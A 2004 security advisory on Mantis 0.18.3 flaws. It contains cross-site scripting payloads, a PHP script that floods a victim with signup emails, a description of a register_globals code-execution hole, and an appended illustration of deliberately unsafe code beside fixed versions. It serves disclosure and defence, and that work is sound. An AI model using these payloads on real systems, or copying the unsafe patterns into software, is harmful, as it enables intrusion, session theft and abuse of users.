[UNIX] Mantis Bug Tracker Multiple Vulnerabilities
From: SecuriTeam (support_at_securiteam.com)
Date: 08/22/04
To: list@securiteam.com Date: 22 Aug 2004 17:24:17 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Mantis Bug Tracker Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.mantisbt.org/> Mantis is "a web-based bug tracking system. It
is written in the PHP scripting language and requires the MySQL database
and a web server".
The Mantis bug tracking system suffers from multiple security issues
mainly due to improper input validation. Hence, cross-site scripting and
even PHP code execution are possible through this system.
DETAILS
Vulnerable Systems:
* Mantis version 0.18.3
Immune Systems:
* Mantis version 0.19.0a2 (Alpha) from CVS
* The 'return' parameter in the login_page.php script is not properly
sanitized and allows a malicious user to input malicious content. It is
possible to log in anonymously and, in order to perform a privileged action,
log in as a registered user. The previous URL is passed as the return
parameter and through it any HTML or script code can be injected. An
example of the XSS vulnerability:
http://
%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E
%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr
* Another XSS vulnerability can be found in the signup.php script (e.g.
<http://bugs.mantisbt.org/signup.php>). The Email address field is not
properly sanitized and will allow dangerous content to be passed. One can
put the following into the Email address:
<iframe src=http://www.playboy.com></iframe> or <h1>Hi!</h1>
* The 'Select Project' script is also vulnerable to a cross-site
scripting attack. The script is 'login_select_proj_page.php' and the
following URL can be used to demonstrate and exploit this issue:
http://
* Cross-site scripting vulnerability in the 'view_all_set.php' script, example
given below:
http://
In addition to the multiple cross-site scripting vulnerabilities, it is
also possible to exploit the product and cause it to send a fairly
arbitrary (and large) amount of emails to a user.
Exploit:
The following script can be used to determine whether your system is
vulnerable to attack or not:
<?php
$email = "anyemail@address";
// Please change it, because it is my e-mail :)
$base_user = "test";
$i = 0;
$site = "http://";
for ($i=0;$i<=15;$i++)
{
    echo("Sending e-mail number $i\n");
    $user = "$base_user$i";
    echo("New user is $user\n");
    $url = "http://$site/signup.php?username=$user&email=$email";
    echo("URL is $url\n");
    $fd = fopen($url,"r");
    echo("E-mail $i sent\n");
    fclose($fd);
}
?>
Finally, there is also a remote PHP code execution in the system. If the
PHP register_globals option is enabled, an attacker is able to inject and
execute PHP code by overwriting the $t_core_dir global variable. The
vulnerable scripts are:
bug_api.php -> at line 22 (using variable $t_core_path)
relationship_api.php -> Line 14 (using variable $t_core_dir)
Vendor Status:
The maintainers of Mantis have been informed and the fixes are already in
the CVS tree, in the alpha version.
ADDITIONAL INFORMATION
The information has been provided by <mailto:joxeankoret@yahoo.es> Joxean
Koret.
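As an added illustration (not code from the advisory or from Mantis itself), the two unsafe patterns the Details section describes, each beside a hardened form: a 'return' parameter reflected unescaped into a page, and an include path read from a global that register_globals lets a request overwrite. The function names and the file name core.php are assumptions.

```php
<?php
// --- 1. Reflected 'return' parameter (cross-site scripting) ---

// Unsafe (constructed example): the request value is written straight into the markup.
function render_return_unsafe($return) {
    return '<input type="hidden" name="return" value="' . $return . '">';
}

// Hardened: accept only a relative application path, then escape for the attribute context.
function render_return_safe($return) {
    // Reject absolute URLs, protocol-relative URLs and any markup characters.
    if (!preg_match('#^/?[A-Za-z0-9_./?=&-]*$#', $return) || strpos($return, '//') === 0) {
        $return = 'main_page.php';   // safe default landing page
    }
    $escaped = htmlspecialchars($return, ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="return" value="' . $escaped . '">';
}

// --- 2. Include path taken from an overwritable global (code execution) ---

// Unsafe: with register_globals on, a request parameter named t_core_dir
// populates this variable before the script runs, so the include can point anywhere.
function load_core_unsafe() {
    global $t_core_dir;
    require_once($t_core_dir . 'core.php');
}

// Hardened: derive the path from the script's own location, never from a global,
// and verify that the resolved file still lies under that directory.
function load_core_safe() {
    $base = dirname(__FILE__) . DIRECTORY_SEPARATOR;
    $path = realpath($base . 'core.php');
    if ($path === false || strpos($path, realpath($base)) !== 0) {
        die('core library missing or outside the application directory');
    }
    require_once($path);
}

// Demonstration of the first pair with a constructed test value.
$sample = '"><b>injected</b>';
echo render_return_unsafe($sample), "\n"; // the value breaks out of the attribute
echo render_return_safe($sample), "\n";   // rejected, falls back to the safe default
?>
```

Disabling register_globals in php.ini removes the precondition for the second pattern outright; the path check is the defence for installations that cannot change the setting.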
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.